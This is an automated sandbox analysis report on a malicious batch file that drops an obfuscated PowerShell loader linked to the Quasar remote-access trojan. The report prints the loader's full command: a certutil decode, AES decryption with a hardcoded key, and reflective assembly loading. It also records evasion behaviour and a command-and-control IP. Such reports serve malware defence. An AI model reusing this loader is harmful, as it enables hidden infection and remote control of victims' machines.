Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\allah.bat.exe "allah.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $lILxN = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\allah.bat').Split([Environment]::NewLine);foreach ($vOhpq in $lILxN) { if ($vOhpq.StartsWith(':: ')) { $OHwZk = $vOhpq.Substring(3); break; }; };$PPhGD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OHwZk);$YGMef = New-Object System.Security.Cryptography.AesManaged;$YGMef.Mode = [System.Security.Cryptography.CipherMode]::CBC;$YGMef.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$YGMef.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6pNVYWetf4chAWo/pEbNaRZ3xRLeWmBPF3OumGmDVww=');$YGMef.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxQsLBFdvl0gyeVxt5ivJg==');$blbua = $YGMef.CreateDecryptor();$PPhGD = $blbua.TransformFinalBlock($PPhGD, 0, $PPhGD.Length);$blbua.Dispose();$YGMef.Dispose();$MkYmI = New-Object System.IO.MemoryStream(, $PPhGD);$wtLBU = New-Object System.IO.MemoryStream;$JeXHz = New-Object System.IO.Compression.GZipStream($MkYmI, [IO.Compression.CompressionMode]::Decompress);$JeXHz.CopyTo($wtLBU);$JeXHz.Dispose();$MkYmI.Dispose();$wtLBU.Dispose();$PPhGD = $wtLBU.ToArray();$weWpP = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($PPhGD);$BDLvJ = $weWpP.EntryPoint;$BDLvJ.Invoke($null, (, [string[]] ('')))
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
          Source: C:\Windows\System32\cmd.exe, File created: C:\Users\user\AppData\Local\Temp\allah.bat.exe
          Source: classification engine, Classification label: mal100.troj.evad.winBAT@8/6@0/1
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\c60dc807-eaae-43be-9bb5-d598c7ab3dad
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4652:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$JeXHz.CopyTo($wtLBU);$JeXHz.Dispose();$MkYmI.Dispose();$wtLBU.Dispose();$PPhGD = $wtLBU.ToArray();$weWpP = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($PPhGD);$BDLvJ = $weWpP.EntryPoint;$BDLvJ.Invoke($null, (, [string[]] ('')))@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. 
Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques"
          Source: unknown, Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\deneme.bat" "
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: deneme.bat, Static file information: File size 2277691 > 1048576
          Source: Binary string: powershell.pdbUGP source: allah.bat.exe, 00000004.00000000.368737034.00007FF7EB5BA000.00000002.00000001.01000000.00000004.sdmp, allah.bat.exe.0.dr
          Source: Binary string: powershell.pdb source: allah.bat.exe, 00000004.00000000.368737034.00007FF7EB5BA000.00000002.00000001.01000000.00000004.sdmp, allah.bat.exe.0.dr
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Code function: 4_2_00007FFBAC11FA92 pushad ; ret 4_2_00007FFBAC11FAA9
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Code function: 4_2_00007FFBAC122BAA push eax; retf 4_2_00007FFBAC122CA3
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Code function: 4_2_00007FFBAC122C83 push eax; retf 4_2_00007FFBAC122CA3
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Code function: 4_2_00007FFBAC1E5334 push esi; iretd 4_2_00007FFBAC1E5337
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Code function: 4_2_00007FFBAC5AE1A1 push edx; iretd 4_2_00007FFBAC5AE51B
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Code function: 4_2_00007FFBAC5A7149 push eax; ret 4_2_00007FFBAC5A72EC
          Source: C:\Windows\System32\cmd.exe, File created: C:\Users\user\AppData\Local\Temp\allah.bat.exe (dropped file)

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, File opened: C:\Users\user\AppData\Local\Temp\allah.bat.exe:Zone.Identifier read attributes | delete
          Source: C:\Windows\System32\cmd.exe, Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\System32\cmd.exe, File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe TID: 3320, Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Window / User API: threadDelayed 9093
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Process information queried: ProcessInformation
          Source: deneme.bat, Binary or memory string: TnJOMEMzU29pQnNGcDI3KzNpbjJTQzU1T2xqSFBsOXFjazMvc21tWmtlZXJPRlFs
          Source: allah.bat.exe, 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: vmware
          Source: allah.bat.exe, 00000004.00000002.684807459.0000020E69C2C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW
          Source: deneme.bat, Binary or memory string: c0xsTHFKTGhqemU5NWhvb1ZYMXlKdXBxZDllWXdCcmNqNmp3T2J1dlVSZzhjZzIv
          Source: deneme.bat, Binary or memory string: TXorajdZTlRaeWpSNURaeTRBZTlCRXg1ZjM4RkRPN0hrQkxjQTk1YVRkVmNETkxZ

          Anti Debugging

          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Code function: 4_2_00007FFBAC11AA8A CheckRemoteDebuggerPresent,4_2_00007FFBAC11AA8A
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Process token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Memory allocated: page read and write | page guard
          Source: C:\Windows\System32\cmd.exe, Process created: C:\Users\user\AppData\Local\Temp\allah.bat.exe "allah.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $lilxn = [system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\appdata\local\temp\allah.bat').split([environment]::newline);foreach ($vohpq in $lilxn) { if ($vohpq.startswith(':: ')) { $ohwzk = $vohpq.substring(3); break; }; };$pphgd = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')($ohwzk);$ygmef = new-object system.security.cryptography.aesmanaged;$ygmef.mode = [system.security.cryptography.ciphermode]::cbc;$ygmef.padding = [system.security.cryptography.paddingmode]::pkcs7;$ygmef.key = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('6pnvywetf4chawo/pebnarz3xrlewmbpf3oumgmdvww=');$ygmef.iv = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('lxqslbfdvl0gyevxt5ivjg==');$blbua = $ygmef.createdecryptor();$pphgd = $blbua.transformfinalblock($pphgd, 0, $pphgd.length);$blbua.dispose();$ygmef.dispose();$mkymi = new-object system.io.memorystream(, $pphgd);$wtlbu = new-object system.io.memorystream;$jexhz = new-object system.io.compression.gzipstream($mkymi, [io.compression.compressionmode]::decompress);$jexhz.copyto($wtlbu);$jexhz.dispose();$mkymi.dispose();$wtlbu.dispose();$pphgd = $wtlbu.toarray();$wewpp = [system.reflection.assembly]::('daol'[-1..-4] -join '')($pphgd);$bdlvj = $wewpp.entrypoint;$bdlvj.invoke($null, (, [string[]] ('')))
          Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\mode.com Mode 60,3
          Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\certutil.exe CERTUTIL -f -decode "C:\Users\user\Desktop\deneme.bat" "C:\Users\user\AppData\Local\Temp\allah.bat"
          Source: C:\Windows\System32\cmd.exe, Process created: C:\Users\user\AppData\Local\Temp\allah.bat.exe "allah.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $lILxN = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\allah.bat').Split([Environment]::NewLine);foreach ($vOhpq in $lILxN) { if ($vOhpq.StartsWith(':: ')) { $OHwZk = $vOhpq.Substring(3); break; }; };$PPhGD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OHwZk);$YGMef = New-Object System.Security.Cryptography.AesManaged;$YGMef.Mode = [System.Security.Cryptography.CipherMode]::CBC;$YGMef.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$YGMef.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6pNVYWetf4chAWo/pEbNaRZ3xRLeWmBPF3OumGmDVww=');$YGMef.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxQsLBFdvl0gyeVxt5ivJg==');$blbua = $YGMef.CreateDecryptor();$PPhGD = $blbua.TransformFinalBlock($PPhGD, 0, $PPhGD.Length);$blbua.Dispose();$YGMef.Dispose();$MkYmI = New-Object System.IO.MemoryStream(, $PPhGD);$wtLBU = New-Object System.IO.MemoryStream;$JeXHz = New-Object System.IO.Compression.GZipStream($MkYmI, [IO.Compression.CompressionMode]::Decompress);$JeXHz.CopyTo($wtLBU);$JeXHz.Dispose();$MkYmI.Dispose();$wtLBU.Dispose();$PPhGD = $wtLBU.ToArray();$weWpP = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($PPhGD);$BDLvJ = $weWpP.EntryPoint;$BDLvJ.Invoke($null, (, [string[]] ('')))
          Source: C:\Windows\System32\cmd.exe, Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match, File source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: Process Memory Space: allah.bat.exe PID: 6956, type: MEMORYSTR

          Remote Access Functionality

          Source: Yara match, File source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: Process Memory Space: allah.bat.exe PID: 6956, type: MEMORYSTR
          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
          Execution: 1 Windows Management Instrumentation; 1 Command and Scripting Interpreter; 1 Scripting; 1 PowerShell; Cron; Launchd; Scheduled Task
          Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
          Privilege Escalation: 11 Process Injection; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
          Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Scripting; 1 Hidden Files and Directories; 1 Obfuscated Files or Information
          Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
          Discovery: 121 Security Software Discovery; 1 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 22 System Information Discovery; System Owner/User Discovery; Network Sniffing
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
          Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
          Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact
Source | Detection | Scanner | Label | Link
deneme.bat | 8% | ReversingLabs | Text.Malware.Generic |
deneme.bat | 17% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\allah.bat | 100% | Avira | TR/Dldr.Malnote.U |
C:\Users\user\AppData\Local\Temp\allah.bat.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\allah.bat.exe | 0% | Virustotal | | Browse

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
74.234.104.236 | 0% | Avira URL Cloud | safe |
https://ipwho.is/ | 0% | Virustotal | | Browse
https://go.microsoft.cot | 0% | Avira URL Cloud | safe |
https://ipwho.is/ | 0% | Avira URL Cloud | safe |
No contacted domains info

Name | Malicious | Antivirus Detection | Reputation
74.234.104.236 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nuget.org/NuGet.exe | allah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/14436606/23354 | allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.633628598.0000020E518B2000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | allah.bat.exe, 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | allah.bat.exe, 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | allah.bat.exe, 00000004.00000002.633628598.0000020E520F9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://stackoverflow.com/q/11564914/23354; | allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/2152978/23354 | allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | allah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | allah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | allah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | allah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ipwho.is/ | allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | allah.bat.exe, 00000004.00000002.633628598.0000020E50D01000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | allah.bat.exe, 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.microsoft.cot | allah.bat.exe, 00000004.00000002.677997205.0000020E68E86000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
74.234.104.236 | unknown | United States | | 7018 | ATT-INTERNET4US | true
                            Joe Sandbox Version:37.1.0 Beryl
                            Analysis ID:876996
                            Start date and time:2023-05-28 09:33:54 +02:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 7m 45s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:9
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample file name:deneme.bat
                            Detection:MAL
                            Classification:mal100.troj.evad.winBAT@8/6@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:Failed
                            HCA Information:
                            • Successful, ratio: 97%
                            • Number of executed functions: 73
                            • Number of non-executed functions: 4
                            Cookbook Comments:
                            • Found application associated with file extension: .bat
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe
• Not all processes were analyzed, report is missing behavior information
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
09:34:54 | API Interceptor | 43x Sleep call for process: allah.bat.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
74.234.104.236 | allah.bat | Get hash | malicious | Quasar | Browse |

No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ATT-INTERNET4US | SxWmdTCfC2t.elf | Get hash | malicious | Mirai, Moobot | Browse | 104.188.187.224
 | 2RIfrkwl8Q.elf | Get hash | malicious | Mirai, Moobot | Browse | 99.158.187.101
 | ufrz7wcBDi.elf | Get hash | malicious | Mirai, Moobot | Browse | 107.200.139.9
 | 8i87E84xva.elf | Get hash | malicious | Mirai, Moobot | Browse | 108.234.108.134
 | 6AU1Y1X4Oy.elf | Get hash | malicious | Mirai, Moobot | Browse | 13.144.6.51
 | zzBfFkqnEg.elf | Get hash | malicious | Mirai, Moobot | Browse | 108.196.66.19
 | 91lC01xoJL.elf | Get hash | malicious | Mirai, Moobot | Browse | 76.227.191.116
 | bnzOgmGCkF.elf | Get hash | malicious | Mirai, Moobot | Browse | 99.2.201.225
 | RQsecy8d0u.elf | Get hash | malicious | Mirai, Moobot | Browse | 68.21.51.3
 | allah.bat | Get hash | malicious | Quasar | Browse | 74.234.104.236
 | freshman.js | Get hash | malicious | Unknown | Browse | 71.143.125.219
 | FpYvEAtlSE.elf | Get hash | malicious | Mirai | Browse | 71.153.237.164
 | Oea3YPoJ4F.elf | Get hash | malicious | Mirai | Browse | 70.225.194.120
 | yg4p59NLkm.elf | Get hash | malicious | Mirai | Browse | 104.62.108.186
 | TWarAEAwUa.elf | Get hash | malicious | Mirai | Browse | 32.48.63.129
 | A6BM2Ru5xc.elf | Get hash | malicious | Mirai | Browse | 74.171.107.150
 | tiOxLaAfn6.elf | Get hash | malicious | Mirai | Browse | 70.228.140.105
 | muchnessGateway.js | Get hash | malicious | Unknown | Browse | 107.97.247.144
 | misadministrati.js | Get hash | malicious | Unknown | Browse | 99.128.119.232
 | moronismUndiffi.js | Get hash | malicious | Unknown | Browse | 104.62.160.68

No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Temp\allah.bat.exe | KqB3s5B5BI.exe | Get hash | malicious | Unknown | Browse |
 | allah.bat | Get hash | malicious | Quasar | Browse |
 | 5hhAqfqkLs.exe | Get hash | malicious | Unknown | Browse |
 | 5hhAqfqkLs.exe | Get hash | malicious | Unknown | Browse |
 | UI721.bin.exe | Get hash | malicious | AgentTesla, LockBit ransomware, LummaC Stealer, RedLine, TrojanRansom, zgRAT | Browse |
 | SecuriteInfo.com.IL.Trojan.MSILZilla.20149.21390.6577.exe | Get hash | malicious | Unknown | Browse |
 | Invoice_6238829.bat | Get hash | malicious | Unknown | Browse |
 | 1.bat | Get hash | malicious | AsyncRAT | Browse |
 | beampredictor.bat | Get hash | malicious | Unknown | Browse |
 | c.cmd | Get hash | malicious | DcRat | Browse |
 | SEQ833Ufdl.exe | Get hash | malicious | Unknown | Browse |
 | 5rIuV7bm6g.exe | Get hash | malicious | Quasar, XWorm | Browse |
 | update.bat | Get hash | malicious | Unknown | Browse |
 | Aktar#U0131m_kopyas#U0131.bat | Get hash | malicious | Unknown | Browse |
 | Remittance_slip.bat | Get hash | malicious | Unknown | Browse |
 | payload1.dll.exe | Get hash | malicious | Unknown | Browse |
 | umuJhqgUNH.exe | Get hash | malicious | Unknown | Browse |
 | Setup.bat | Get hash | malicious | Unknown | Browse |
 | Parts and Inquiry.bat | Get hash | malicious | Unknown | Browse |
 | loder.bat | Get hash | malicious | Unknown | Browse |
                                                                      Process:C:\Users\user\AppData\Local\Temp\allah.bat.exe
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):9432
                                                                      Entropy (8bit):4.918232018284106
                                                                      Encrypted:false
                                                                      SSDEEP:192:Nxoe5FpOMxoe5Pib4GVsm5emdygkjDt4iWN3yBGHh9smidcU6CGdcU6CS9smDpOh:bfib4Glkjh4iUxs14fib41
                                                                      MD5:F6775EDC5EE3B8EEDBF8310BD48C709D
                                                                      SHA1:51DBC51183BFBFE57F24E9AD63840E60D2E64842
